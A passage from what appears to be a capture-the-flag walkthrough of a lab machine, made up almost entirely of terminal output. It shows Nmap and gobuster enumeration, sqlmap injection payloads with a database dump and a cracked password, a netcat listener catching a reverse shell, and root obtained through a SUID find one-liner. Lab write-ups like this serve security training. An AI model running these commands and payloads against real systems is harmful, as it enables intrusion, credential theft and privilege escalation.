| B58E6202-6D04-5CB0-8529-59713C0E13B8 4.3 https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8 *EXPLOIT*
| B53D7077-1A2B-5640-9581-0196F6138301 4.3 https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301 *EXPLOIT*
| A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F 4.3 https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F *EXPLOIT*
| A90ABEAD-13A8-5F09-8A19-6D9D2D804F05 4.3 https://vulners.com/githubexploit/A90ABEAD-13A8-5F09-8A19-6D9D2D804F05 *EXPLOIT*
| 9EE3F7E3-70E6-503E-9929-67FE3F3735A2 4.3 https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2 *EXPLOIT*
| 9D511461-7D24-5402-8E2A-58364D6E758F 4.3 https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F *EXPLOIT*
| 9CEA663C-6236-5F45-B207-A873B971F988 4.3 https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988 *EXPLOIT*
| 987C6FDB-3E70-5FF5-AB5B-D50065D27594 4.3 https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594 *EXPLOIT*
| 89732403-A14E-5A5D-B659-DD4830410847 4.3 https://vulners.com/githubexploit/89732403-A14E-5A5D-B659-DD4830410847 *EXPLOIT*
| 86360765-0B1A-5D73-A805-BAE8F1B5D16D 4.3 https://vulners.com/githubexploit/86360765-0B1A-5D73-A805-BAE8F1B5D16D *EXPLOIT*
| 805E6B24-8DF9-51D8-8DF6-6658161F96EA 4.3 https://vulners.com/githubexploit/805E6B24-8DF9-51D8-8DF6-6658161F96EA *EXPLOIT*
| 789B6112-E84C-566E-89A7-82CC108EFCD9 4.3 https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9 *EXPLOIT*
| 788F7DF8-01F3-5D13-9B3E-E4AA692153E6 4.3 https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6 *EXPLOIT*
| 6E484197-456B-55DF-8D51-C2BB4925F45C 4.3 https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C *EXPLOIT*
| 6CAA7558-723B-5286-9840-4DF4EB48E0AF 4.3 https://vulners.com/githubexploit/6CAA7558-723B-5286-9840-4DF4EB48E0AF *EXPLOIT*
| 68E78C64-D93A-5E8B-9DEA-4A8D826B474E 4.3 https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E *EXPLOIT*
| 6758CFA9-271A-5E99-A590-E51F4E0C5046 4.3 https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046 *EXPLOIT*
| 674BA200-C494-57E6-B1B4-1672DDA15D3C 4.3 https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C *EXPLOIT*
| 5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 4.3 https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31 *EXPLOIT*
| 4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F 4.3 https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F *EXPLOIT*
| 4C79D8E5-D595-5460-AA84-18D4CB93E8FC 4.3 https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC *EXPLOIT*
| 4B44115D-85A3-5E62-B9A8-5F336C24673F 4.3 https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F *EXPLOIT*
| 41F0C2DA-2A2B-5ACC-A98D-CAD8D5AAD5ED 4.3 https://vulners.com/githubexploit/41F0C2DA-2A2B-5ACC-A98D-CAD8D5AAD5ED *EXPLOIT*
| 3CF66144-235E-5F7A-B889-113C11ABF150 4.3 https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150 *EXPLOIT*
| 379FCF38-0B4A-52EC-BE3E-408A0467BF20 4.3 https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20 *EXPLOIT*
| 365CD0B0-D956-59D6-9500-965BF4017E2D 4.3 https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D *EXPLOIT*
| 2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F 4.3 https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F *EXPLOIT*
| 2B4FEB27-377B-557B-AE46-66D677D5DA1C 4.3 https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C *EXPLOIT*
| 1B75F2E2-5B30-58FA-98A4-501B91327D7F 4.3 https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F *EXPLOIT*
| 1337DAY-ID-35422 4.3 https://vulners.com/zdt/1337DAY-ID-35422 *EXPLOIT*
| 1145F3D1-0ECB-55AA-B25D-A26892116505 4.3 https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505 *EXPLOIT*
| 108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 4.3 https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2 *EXPLOIT*
| 0BC014D0-F944-5E78-B5FA-146A8E5D0F8A 4.3 https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A *EXPLOIT*
| 0AA6A425-25B1-5D2A-ABA1-2933D3E1DC56 4.3 https://vulners.com/githubexploit/0AA6A425-25B1-5D2A-ABA1-2933D3E1DC56 *EXPLOIT*
| 07AA70EA-C34E-5F66-9510-7C265093992A 4.3 https://vulners.com/githubexploit/07AA70EA-C34E-5F66-9510-7C265093992A *EXPLOIT*
| 06076ECD-3FB7-53EC-8572-ABBB20029812 4.3 https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812 *EXPLOIT*
| 05403438-4985-5E78-A702-784E03F724D4 4.3 https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4 *EXPLOIT*
| 00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 4.3 https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08 *EXPLOIT*
| CVE-2024-24823 3.6 https://vulners.com/cve/CVE-2024-24823
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
| CVE-2023-45802 2.6 https://vulners.com/cve/CVE-2023-45802
| OSV:BIT-APACHE-2020-13938 2.1 https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
| OSV:BIT-APACHE-2024-27316 0.0 https://vulners.com/osv/OSV:BIT-APACHE-2024-27316
| OSV:BIT-APACHE-2024-24795 0.0 https://vulners.com/osv/OSV:BIT-APACHE-2024-24795
| OSV:BIT-APACHE-2023-38709 0.0 https://vulners.com/osv/OSV:BIT-APACHE-2023-38709
| B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 0.0 https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 *EXPLOIT*
|_ 45D138AD-BEC6-552A-91EA-8816914CA7F4 0.0 https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4 *EXPLOIT*
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/clients/disconnected: 1
| $SYS/broker/clients/maximum: 2
| $SYS/broker/store/messages/bytes: 154
| $SYS/broker/publish/messages/sent: 59
| $SYS/broker/clients/active: 1
| $SYS/broker/load/bytes/received/5min: 22.45
| $SYS/broker/load/messages/sent/15min: 4.00
| $SYS/broker/heap/maximum: 52480
| $SYS/broker/messages/received: 7
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/load/bytes/received/1min: 69.93
| $SYS/broker/messages/stored: 32
| $SYS/broker/load/messages/received/5min: 1.09
| $SYS/broker/subscriptions/count: 4
| $SYS/broker/load/bytes/sent/5min: 377.76
| $SYS/broker/load/connections/15min: 0.25
| $SYS/broker/load/sockets/5min: 0.82
| $SYS/broker/bytes/sent: 2358
| $SYS/broker/clients/inactive: 1
| $SYS/broker/load/bytes/received/15min: 8.62
| $SYS/broker/load/connections/1min: 2.01
| $SYS/broker/load/sockets/15min: 0.31
| $SYS/broker/uptime: 3597 seconds
| $SYS/broker/store/messages/count: 32
| $SYS/broker/load/sockets/1min: 2.61
| $SYS/broker/publish/bytes/sent: 263
| $SYS/broker/messages/sent: 65
| $SYS/broker/retained messages/count: 35
| $SYS/broker/bytes/received: 140
| $SYS/broker/load/bytes/sent/1min: 1163.22
| $SYS/broker/load/publish/sent/1min: 28.72
| $SYS/broker/load/messages/sent/5min: 10.38
| $SYS/broker/load/publish/sent/15min: 3.63
| $SYS/broker/clients/total: 2
| $SYS/broker/load/publish/sent/5min: 9.42
| $SYS/broker/load/connections/5min: 0.64
| $SYS/broker/clients/connected: 1
| $SYS/broker/load/messages/received/1min: 3.13
| $SYS/broker/load/messages/received/15min: 0.43
| $SYS/broker/load/messages/sent/1min: 31.75
| $SYS/broker/load/bytes/sent/15min: 145.21
|_ $SYS/broker/heap/current: 52080
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds โโโ(kaliใฟkali)-[~]
โโ$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.98.61:1337
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.61:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/admin (Status: 301) [Size: 317] [--> http://10.10.98.61:1337/admin/]
/index.php (Status: 200) [Size: 91]
/javascript (Status: 301) [Size: 322] [--> http://10.10.98.61:1337/javascript/]
/phpmyadmin (Status: 301) [Size: 322] [--> http://10.10.98.61:1337/phpmyadmin/]
/server-status (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
โโโ(kaliใฟkali)-[~]
โโ$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.98.61:1337
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.61:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/admin (Status: 301) [Size: 317] [--> http://10.10.98.61:1337/admin/]
/admin_101 (Status: 301) [Size: 321] [--> http://10.10.98.61:1337/admin_101/]
/javascript (Status: 301) [Size: 322] [--> http://10.10.98.61:1337/javascript/]
/phpmyadmin (Status: 301) [Size: 322] [--> http://10.10.98.61:1337/phpmyadmin/]
/server-status (Status: 403) [Size: 278]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================2cii - SQLmap
โโโ(kaliใฟkali)-[~]
โโ$ sqlmap -u http://10.10.89.22:1337/admin_101/includes/user_login.php --data "email=*&password=*" --dump
___
__H__
___ ___[']_____ ___ ___ {1.8.4#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:27:04 /2024-04-30/
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
[21:27:05] [INFO] resuming back-end DBMS 'mysql'
[21:27:05] [INFO] testing connection to the target URL
[21:27:05] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[21:27:05] [INFO] testing if the target URL content is stable
[21:27:05] [INFO] target URL content is stable
[21:27:05] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[21:27:06] [INFO] (custom) POST parameter '#1*' appears to be dynamic
[21:27:06] [INFO] heuristic (basic) test shows that (custom) POST parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[21:27:06] [INFO] heuristic (XSS) test shows that (custom) POST parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[21:27:06] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[21:27:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:27:11] [WARNING] reflective value(s) found and filtering out
[21:27:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:27:12] [INFO] testing 'Generic inline queries'
[21:27:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:27:20] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:27:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[21:27:33] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:27:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:27:57] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:28:10] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:28:23] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:28:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:28:37] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
[21:28:37] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:28:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:28:37] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:28:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:28:38] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[21:28:38] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[21:28:38] [INFO] testing 'MySQL inline queries'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[21:28:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[21:28:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[21:28:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:28:49] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[21:28:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:28:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:28:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:28:53] [INFO] target URL appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[21:29:07] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[21:29:07] [INFO] testing 'MySQL UNION query (60) - 21 to 40 columns'
[21:29:11] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
[21:29:14] [INFO] testing 'MySQL UNION query (60) - 61 to 80 columns'
[21:29:17] [INFO] testing 'MySQL UNION query (60) - 81 to 100 columns'
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 685 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: email=' AND EXTRACTVALUE(2974,CASE WHEN (2974=2974) THEN 2974 ELSE 0x3A END)-- xTMY&password=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: email=' AND GTID_SUBSET(CONCAT(0x7171716b71,(SELECT (ELT(7352=7352,1))),0x71766b7671),7352)-- PMCO&password=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=' AND (SELECT 4226 FROM (SELECT(SLEEP(5)))tBxm)-- HYpo&password=
---
[21:29:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6
[21:29:23] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:29:23] [INFO] fetching current database
[21:29:23] [INFO] retrieved: 'expose'
[21:29:23] [INFO] fetching tables for database: 'expose'
[21:29:24] [INFO] retrieved: 'config'
[21:29:24] [INFO] retrieved: 'user'
[21:29:24] [INFO] fetching columns for table 'config' in database 'expose'
[21:29:24] [INFO] retrieved: 'id'
[21:29:24] [INFO] retrieved: 'int'
[21:29:25] [INFO] retrieved: 'url'
[21:29:25] [INFO] retrieved: 'text'
[21:29:25] [INFO] retrieved: 'password'
[21:29:25] [INFO] retrieved: 'text'
[21:29:25] [INFO] fetching entries for table 'config' in database 'expose'
[21:29:25] [INFO] retrieved: '/file1010111/index.php'
[21:29:25] [INFO] retrieved: '1'
[21:29:26] [INFO] retrieved: '69c66901194a6486176e81f5945b8929'
[21:29:26] [INFO] retrieved: '/upload-cv00101011/index.php'
[21:29:26] [INFO] retrieved: '3'
[21:29:26] [INFO] retrieved: '// ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z'
[21:29:26] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[21:29:35] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[21:29:38] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[21:29:41] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:29:41] [INFO] starting 4 processes
[21:29:43] [INFO] cracked password 'easytohack' for hash '69c66901194a6486176e81f5945b8929'
Database: expose
Table: config
[2 entries]
+----+------------------------------+-----------------------------------------------------+
| id | url | password |
+----+------------------------------+-----------------------------------------------------+
| 1 | /file1010111/index.php | 69c66901194a6486176e81f5945b8929 (REDACTED_BY_ME) |
| 3 | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
+----+------------------------------+-----------------------------------------------------+
[21:29:46] [INFO] table 'expose.config' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.89.22/dump/expose/config.csv'
[21:29:46] [INFO] fetching columns for table 'user' in database 'expose'
[21:29:46] [INFO] retrieved: 'id'
[21:29:46] [INFO] retrieved: 'int'
[21:29:47] [INFO] retrieved: 'email'
[21:29:47] [INFO] retrieved: 'varchar(512)'
[21:29:47] [INFO] retrieved: 'password'
[21:29:47] [INFO] retrieved: 'varchar(512)'
[21:29:47] [INFO] retrieved: 'created'
[21:29:47] [INFO] retrieved: 'timestamp'
[21:29:47] [INFO] fetching entries for table 'user' in database 'expose'
[21:29:48] [INFO] retrieved: '2023-02-21 09:05:46'
[21:29:48] [INFO] retrieved: 'hacker@root.thm'
[21:29:48] [INFO] retrieved: '1'
[21:29:48] [INFO] retrieved: 'VeryDifficultPassword!!#@#@!#!@#1231'
Database: expose
Table: user
[1 entry]
+----+-----------------+---------------------+--------------------------------------+
| id | email | created | password |
+----+-----------------+---------------------+--------------------------------------+
| 1 | hacker@root.thm | 2023-02-21 09:05:46 | REDACTED_BY_ME |
+----+-----------------+---------------------+--------------------------------------+
[21:29:48] [INFO] table 'expose.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.89.22/dump/expose/user.csv'
[21:29:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.89.22'
[*] ending @ 21:29:48 /2024-04-30/The SQLMap output was very helpful:
The password of hacker@root.thm on admin_101
There are files we have to inspect:
:1337/file1010111/index.php
:1337/upload-cv00101011/index.php
โโโ(kaliใฟkali)-[~]
โโ$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.89.22] 36222
Linux ip-10-10-89-22 5.15.0-1039-aws #44~20.04.1-Ubuntu SMP Thu Jun 22 12:21:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
19:17:49 up 2:16, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (781): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-10-89-22:/$ cd /home/zeamkish
www-data@ip-10-10-89-22:/home/zeamkish$ ls -la
ls -la
total 36
drwxr-xr-x 3 zeamkish zeamkish 4096 Jul 6 2023 .
drwxr-xr-x 4 root root 4096 Jun 30 2023 ..
-rw-rw-r-- 1 zeamkish zeamkish 5 Jul 6 2023 .bash_history
-rw-r--r-- 1 zeamkish zeamkish 220 Jun 8 2023 .bash_logout
-rw-r--r-- 1 zeamkish zeamkish 3771 Jun 8 2023 .bashrc
drwx------ 2 zeamkish zeamkish 4096 Jun 8 2023 .cache
-rw-r--r-- 1 zeamkish zeamkish 807 Jun 8 2023 .profile
-rw-r----- 1 zeamkish zeamkish 27 Jun 8 2023 flag.txt
-rw-rw-r-- 1 root zeamkish 34 Jun 11 2023 ssh_creds.txt
www-data@ip-10-10-89-22:/home/zeamkish$ cat ssh_creds.txt
cat ssh_creds.txt
SSH CREDS
zeamkish
REDACTED_BY_MENow that we have the SSH credentials, let us exit the dumb reverse shell and connect via SSH instead. Much more convenient.
โโโ(kaliใฟkali)-[~]
โโ$ ssh zeamkish@10.10.89.22
The authenticity of host '10.10.89.22 (10.10.89.22)' can't be established.
ED25519 key fingerprint is SHA256:QVicBVNdk7FT/JLQ+djdhP3mB3y9OFF2iwsRiOoECNY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.89.22' (ED25519) to the list of known hosts.
zeamkish@10.10.89.22's password:
Permission denied, please try again.
zeamkish@10.10.89.22's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-1039-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 30 19:22:42 UTC 2024
System load: 0.0 Processes: 126
Usage of /: 13.3% of 58.09GB Users logged in: 0
Memory usage: 18% IPv4 address for eth0: 10.10.89.22
Swap usage: 0%
* Ubuntu Pro delivers the most comprehensive open source security and
compliance features.
https://ubuntu.com/aws/pro
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun Jul 2 17:27:46 2023 from 10.10.83.109
zeamkish@ip-10-10-89-22:~$ cat flag.txt
THM{}
zeamkish@ip-10-10-89-22:~$ After I tried looking for something interesting in sudo -l, I began listing programs that are usually owned by root and that could have the SUID bit set. First try, find!
zeamkish@ip-10-10-89-22:~$ ls -la /usr/bin/find
-rwsr-x--- 1 root zeamkish 320160 Feb 18 2020 /usr/bin/find
zeamkish@ip-10-10-89-22:~$ find . -exec /bin/sh -p \; -quit
# cd /root
# ls
flag.txt snap
# cat flag.txt
THM{}
